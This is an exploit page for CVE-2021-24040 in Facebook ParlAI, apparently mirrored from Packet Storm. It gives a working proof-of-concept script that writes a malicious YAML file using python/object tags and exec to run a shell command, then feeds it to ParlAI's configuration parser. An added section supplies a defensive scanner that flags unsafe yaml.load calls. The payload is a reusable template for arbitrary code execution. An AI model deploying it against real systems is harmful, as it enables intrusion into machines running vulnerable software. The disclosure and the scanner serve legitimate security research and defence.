## https://sploitus.com/exploit?id=PACKETSTORM:164136
# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai  
# Date: 2021-09-11  
# Exploit Author: Abhiram V  
# Vendor Homepage: https://parl.ai/  
# Software Link: https://github.com/facebookresearch/ParlAI  
# Version: < 1.1.0  
# Tested on: Linux  
# CVE: CVE-2021-24040  
# References :   
# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg  
# https://anon-artist.github.io/blogs/blog3.html  
  
############################################################################  
  
Introduction  
ParlAI (pronounced “par-lay”) is a free, open-source Python framework for  
sharing, training and evaluating AI models on a variety of openly available  
dialogue datasets.  
  
############################################################################  
  
Vulnerability details  
  
############################################################################  
  
Description  
ParlAI was vulnerable to a YAML deserialization attack caused by unsafe  
loading, which leads to arbitrary code execution.  
  
Proof of Concept  
  
Create the following PoC file (exploit.py)  
  
import os  
#os.system('pip3 install parlai')  
from parlai.chat_service.utils import config  
exploit = """!!python/object/new:type  
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]  
listitems: "__import__('os').system('xcalc')"  
"""  
open('config.yml','w+').write(exploit)  
config.parse_configuration_file('config.yml')  
  
Execute the Python script, i.e., python3 exploit.py  
  
Impact  
Code Execution  
  
############################################################################
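
A defender-side audit for the unsafe loading named in the Description, added here as an example; it is not part of the original advisory and not ParlAI's code. It walks Python source with the standard `ast` module and reports PyYAML load calls that do not use a safe loader; the function name `find_unsafe_yaml_loads` and the sample source are constructed for illustration.

```python
import ast

# Loaders that never construct arbitrary Python objects from python/* tags.
SAFE_LOADERS = {"SafeLoader", "CSafeLoader", "BaseLoader", "CBaseLoader"}
# Convenience wrappers that always use a non-safe loader.
UNSAFE_WRAPPERS = {"unsafe_load", "unsafe_load_all", "full_load", "full_load_all"}


def _name(node):
    """Trailing identifier of a Name/Attribute node, else None."""
    return getattr(node, "attr", None) or getattr(node, "id", None)


def find_unsafe_yaml_loads(source):
    """Return sorted (line, reason) pairs for risky `yaml.*` load calls.

    Limitation: only calls written as `yaml.<func>(...)` are recognised.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)):
            continue
        if _name(node.func.value) != "yaml":
            continue
        func = node.func.attr
        if func in UNSAFE_WRAPPERS:
            findings.append((node.lineno, f"yaml.{func}"))
        elif func in ("load", "load_all"):
            # Loader is a keyword or the second positional argument.
            loader = next((k.value for k in node.keywords if k.arg == "Loader"), None)
            if loader is None and len(node.args) > 1:
                loader = node.args[1]
            if loader is None:
                findings.append((node.lineno, f"yaml.{func} without Loader"))
            elif _name(loader) not in SAFE_LOADERS:
                findings.append((node.lineno, f"yaml.{func} with {_name(loader)}"))
    return sorted(findings)


# Constructed sample source for the demo; not ParlAI's code.
SAMPLE = """import yaml
a = yaml.load(open("config.yml"))
b = yaml.load(open("config.yml"), Loader=yaml.FullLoader)
c = yaml.safe_load(open("config.yml"))
d = yaml.load(open("config.yml"), Loader=yaml.SafeLoader)
e = yaml.unsafe_load(open("config.yml"))
"""

if __name__ == "__main__":
    print(find_unsafe_yaml_loads(SAMPLE))
```

Each finding is a call site to switch to `yaml.safe_load` (or `Loader=yaml.SafeLoader`) when the file can come from an untrusted source.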